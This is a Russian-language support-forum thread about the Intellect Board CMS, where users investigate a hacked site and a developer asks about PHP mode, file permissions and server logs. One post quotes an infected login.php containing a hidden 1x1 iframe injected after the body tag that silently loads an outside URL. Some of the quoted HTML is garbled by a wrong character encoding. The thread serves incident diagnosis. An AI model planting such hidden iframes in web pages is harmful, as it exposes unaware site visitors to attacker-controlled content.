Intellect Board — cистема управления сайтом

eugrus, а не баннеры ли это, вставляемые хостером (так называемый "бесплатный хостинг")?

Сегодня повторилось.

Что это такое ясно и так. Вопрос лишь: как оно появилось.

Написал конечно хостеру, НО мне кажется, в движке обнаружена новая уязвимость: в момент, когда открывался форум кроме порноресурса было ещё соединение с forum.antichat.ru

К сожалению сейчас (до повторного появления) точно сказать не смогу.

В личку!

Кстати, внедрение осуществлено весьма изящно, скажем вот login.php:

<?

if (!$_GET['a']) { header("Location: http://".$_SERVER['SERVER_NAME']."/index.php?m=profile&a=login"); }

else { ?>

<html><head>

<link rel="stylesheet" href="styles/abstract/abstract.css" type="text/css">

</head><body bgcolor=#e5e5e5><iframe src='http://ltds.biz/go.php?id=3240&user_name=gh0st' width='1' height='1' style='visibility: hidden;'></iframe>

<div>рЕОЕПЭ БШ ЛНФЕРЕ:<ul>

<li><a href="index.php">оЕПЕИРХ МЮ ЦКЮБМСЧ ЯРПЮМХЖС</a>

<li><a href="http://www.vv.kz/index.php?f=15&a=an_form">дНАЮБХРЭ НАЗЪБКЕМХЕ</a>

<li><a href="admin/index.php">оЕПЕИРХ Б жЕМРП юДЛХМХЯРПХПНБЮМХЪ</a>

<li><a href="index.php?m=moderate&a=premod">оЕПЕИРХ Й ОПЕЛНДЕПЮЖХХ</a>

<li><a href="http://www.vv.kz/index.php?f=98&a=add_article">дНАЮБХРЭ ЯРЮРЭЧ</a>

</ul></div>

<? }

Особого изящества тут нет: тупо искали тег <body> и вставляли после него...
Архив пришли мне на Email, а также интересует следующее:
а) как выполняется скрипт: от имени nobody или же от имени пользователя (иными словами, как работает PHP: Apache-модуль или как CGI-приложение)
б) какие права доступа стояли на эти файлы
в) известно ли точное время взлома. Если да, то хотелось бы увидеть лог сервера за 30 минут до этого момента.